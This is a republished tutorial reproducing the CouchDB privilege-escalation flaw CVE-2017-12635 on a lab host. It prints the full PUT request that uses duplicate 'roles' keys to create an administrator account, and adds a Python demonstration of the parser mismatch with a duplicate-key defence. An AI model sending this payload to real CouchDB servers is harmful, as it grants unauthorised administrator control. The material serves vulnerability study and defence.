
How the CouchDB vertical privilege escalation vulnerability CVE-2017-12635 is reproduced

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article explains in detail how to reproduce the CouchDB vertical privilege escalation vulnerability CVE-2017-12635. The content is of high quality, so the editor is sharing it for reference. I hope you will have a solid understanding of the relevant knowledge after reading it.

CouchDB is an open source document-oriented database management system that is accessed through a RESTful JSON (JavaScript Object Notation) API. The name "Couch" is an acronym for "Cluster Of Unreliable Commodity Hardware" and reflects CouchDB's goal of high scalability, providing high availability and reliability even on failure-prone hardware.

CVE-2017-12635 stems from the different ways Erlang and JavaScript parse JSON, which lead the two sides to interpret the same document differently when it is processed. The vulnerability allows any user to create an administrator, so it is a vertical privilege escalation (authorization bypass) vulnerability.

What follows is only a record of reproducing the vulnerability; the exploitation process is as follows:

I. Vulnerable environment

Target link: http://192.168.101.152:5984/

Accessing it directly looks like this.

Visiting http://192.168.101.152:5984/_utils/ shows the following.

Clicking _users directly prompts that you do not have permission to access the database.

II. Exploitation process

If the first request is sent as-is, a 403 error is returned, indicating that only an administrator can set roles.

But by sending a request whose body contains two "roles" keys, the restriction can be bypassed and an administrator account created. Here an administrator account whose username and password are both vulhub is created.

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.101.152:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

Return to the web front end and log in as this user; the _users database can now be accessed.
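The following is an added example, not code from the original article or from the CouchDB project, illustrating the parsing difference described above and the document shape used in the request. It models two JSON decoders in Python: one that keeps the first value of a repeated key (the behaviour the Erlang side exhibited, which is why the stored document carried "_admin") and one that keeps the last (what JavaScript's JSON.parse does, which is why the validation function saw an empty roles list). It then shows the defensive counterpart: a strict parser that refuses any object with a duplicate key, plus a boundary check that rejects a self-service user document asking for "_admin". The sample document string and the helper names (first_wins, last_wins, parse_strict, check_user_doc) are constructed for this example.

```python
import json

# Constructed sample document: the duplicate "roles" shape from the request above.
DUPLICATE_ROLES_DOC = (
    '{"type": "user", "name": "vulhub", '
    '"roles": ["_admin"], "roles": [], "password": "vulhub"}'
)


def first_wins(pairs):
    """Keep the first value of a repeated key.

    Models a decoder that stores key/value pairs in document order and returns
    the first match on lookup, the behaviour the Erlang side showed in
    CVE-2017-12635 (assumption for this example: a simplified model).
    """
    result = {}
    for key, value in pairs:
        result.setdefault(key, value)
    return result


def last_wins(pairs):
    """Keep the last value of a repeated key, as JavaScript's JSON.parse and
    Python's json.loads do by default."""
    return dict(pairs)


def parse_as_erlang_side(text):
    return json.loads(text, object_pairs_hook=first_wins)


def parse_as_js_side(text):
    return json.loads(text, object_pairs_hook=last_wins)


class DuplicateKeyError(ValueError):
    """Raised when an object in the input repeats a key."""


def strict_pairs(pairs):
    """object_pairs_hook that refuses any object (nested ones included) with a repeated key."""
    seen = set()
    for key, _ in pairs:
        if key in seen:
            raise DuplicateKeyError(f"duplicate key {key!r}")
        seen.add(key)
    return dict(pairs)


def parse_strict(text):
    """Defensive parse: exactly one interpretation of the input, or an error."""
    return json.loads(text, object_pairs_hook=strict_pairs)


def roles_seen_by_each_side(text):
    """Return (erlang_side_roles, js_side_roles) for the same request body."""
    return (parse_as_erlang_side(text)["roles"], parse_as_js_side(text)["roles"])


def check_user_doc(text):
    """Boundary check to run before a document reaches two different parsers.

    Returns (accepted, reason). Duplicate keys are rejected outright, and a
    self-service user document may not request the "_admin" role (the rule the
    403 in the write-up enforces for the single-key case).
    """
    try:
        doc = parse_strict(text)
    except DuplicateKeyError as exc:
        return False, str(exc)
    if "_admin" in doc.get("roles", []):
        return False, "roles may not contain _admin"
    return True, "ok"


if __name__ == "__main__":
    print("erlang-side / js-side roles:", roles_seen_by_each_side(DUPLICATE_ROLES_DOC))
    print("strict check:", check_user_doc(DUPLICATE_ROLES_DOC))
```

Running the block prints `(['_admin'], [])` for the two interpretations of the same body and `(False, "duplicate key 'roles'")` for the strict check. The design point is that a validator and a storage layer must agree on one canonical parse; rejecting duplicate keys at the boundary removes the ambiguity instead of hoping both parsers resolve it the same way.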

That is how the CouchDB vertical privilege escalation vulnerability CVE-2017-12635 is reproduced. I hope the above content is of some help to you and lets you learn more. If you think the article is good, share it so more people can see it.
